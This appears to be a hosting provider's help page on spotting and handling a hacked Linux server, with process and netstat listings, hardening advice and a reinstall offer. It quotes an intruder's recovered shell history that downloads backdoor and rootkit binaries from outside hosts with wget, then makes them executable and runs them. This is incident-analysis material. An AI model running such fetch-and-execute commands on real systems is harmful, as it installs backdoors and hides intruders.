Hacked machine

It doesn't only happen to others.

How to see that a machine is hacked?

By having a look at MRTG, you can't go wrong:





And on the machine, we find:

root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]

root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400


Obviously, the hacker has been able to launch softs in root. The machine is thus hacked and must be re-installed.

# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823


It exist launched softs, which have a pid and that are not seen by ps, surely due to the fact that ps has been replaced by a hacked ps that filters all softs of the hacker in order to trick the eye.

# halt

Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...

The system is going down for system halt NOW !!

We immediately stop the machine.

We can have the chance to have a SemiHackedMachine.

An other experience: HackedMachineExample..

Why is the machine hacked?

The origin of the problems are multiple, but we can sum up it as follows:
you are not paranoid.

You use telnet. Your login and password travel via Internet and they can be 'stolen' at any time. You must use SSH. Here is a manual about it: SshOnDedicated.

You use FTP, your login and password travel on Internet and it's the same root password. Sftp is your solution.

You use pop3/imap with the password and it's the root password. Use APOP or POP3S/IMAPS. Here is a manual about it: SmtpPop3Imap.

If you don't update your server with releases ReleasePatch, your risk easy hack (about 250 scans are carried out a day on our network in order to detect security faults).

What to do?

Once the machine is hacked, there is only one efficient solution left: to reinstall it.

The price is £90 + VAT and you restart with a re-setup release on a new disk. If the box allows it, we will put the previous disk in secondary and we mount it on /mmt (for 10 days).

Hack examples

1. CGI script fault

Symptoms

A g00dies.tgz file uploaded in /tmp with other files: x, k, etc...
The x program is a backdoor, if it's launched, it gives access to the server.

We have found the bash.history of nobody user in /tmp, here is the content:

cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth


Comments

Thanks to it, we can notice that commands have been placed as nobody, but this user is mainly used by Apache. It looks like the hacker benefited from a vulnerability of a CGI script.

Resolution

- Killer all suspected process in progress.
The hacker is obviously not in root (it could actually benefit from a kernel default <2.4.24);
However, we make some basic operations/verifications:

  • Change all passwords: root, user, mysql, mail, etc... (we can see that the hacker has launched mingetty)
  • Search for files, which have been modified since the hack: find /rep -cmin -60 (check all files modified for less than one hour).

- Consult then Apache logs at about the time the hack happened to find the suspected script.